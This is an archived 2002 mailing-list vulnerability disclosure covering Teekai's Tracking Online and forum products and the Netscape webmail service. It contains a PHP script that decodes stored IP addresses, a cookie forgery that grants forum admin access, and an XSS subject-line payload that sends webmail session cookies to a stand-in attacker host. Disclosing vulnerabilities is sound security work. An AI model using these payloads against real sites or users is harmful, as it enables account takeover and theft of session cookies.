Security holes in two of Teekai's products + security hole in ncmail.netscape.com

From: frog frog (leseulfrogat_private)
Date: Mon Jun 03 2002 - 12:52:07 PDT

    Hi :)
    
    Products :
    **********
    Tracking Online 1.0
    Teekai's forum full 1.2
    http://www.teekai.info
    
    Problems :
    **********
    Tracking Online & Teekai's forum :
    - Information recovery
    - Information decoding
    Teekai's forum :
    - Admin access
    - small holes
    Tracking Online :
    - XSS
    
    Exploits :
    **********
    Forum & Tracking :
    - PHP file to decode information :
    <?php
    // Decode an "encrypted" IP as stored by Tracking Online / Teekai's forum.
    // The original relied on register_globals; read $cryptedip from the query string or first CLI argument.
    $cryptedip = explode('.', $_GET['cryptedip'] ?? ($argv[1] ?? ''));
    if (count($cryptedip) !== 4) {
        exit("Usage: cryptedip=a.b.c.d (query string or first CLI argument)\n");
    }
    // md5("20") is a hex string; as a divisor PHP keeps only its leading
    // decimal digits, so the "key" is really a small constant.
    $key = (int) md5("20");
    $trueip = $cryptedip[0] / $key . "." . $cryptedip[1] / $key . "."
            . $cryptedip[2] / $key . "." . $cryptedip[3] / $key;
    echo "Result : $trueip";
    ?>
    
    Forum :
    - /data/member_log.txt
    - Setcookie "valid_level=admin"
    - Setcookie "valid_username_online=[VALUE e.g. JScript ]"
    - ...
    
    Tracking Online :
    - /data/userlog/log.txt
    - /userlog.php
    - ...
    
    More details in french :
    http://www.ifrance.com/kitetoua/tuto/Teekai.txt
    
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FTeekai.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
    
    
    
    
    There is a security hole in the mail service that Netscape offers ( 
    http://ncmail.netscape.com ).
    It makes it possible to inject HTML into an e-mail... and this service 
    authenticates by cookies.
    
    The hole consists of sending a mail whose subject is a JScript preceded 
    by : ";</script*> .
    
    The idea would be a script of this kind as the subject :
    ";</script*><form name=a*><input name=o 
    value=http://www.attacker.com/script?*></form*><script*>window.open
    (document.a.o.value+document.cookie)</script*>
    
    without the '*'.
    I use <form> because " and ' are replaced by \" or \'.
    
    Vendors were informed but did not fix it.
    
    Maybe more details soon...
    
    Sorry for my poor English.
    
    frog-m@n 
    



    This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 13:42:11 PDT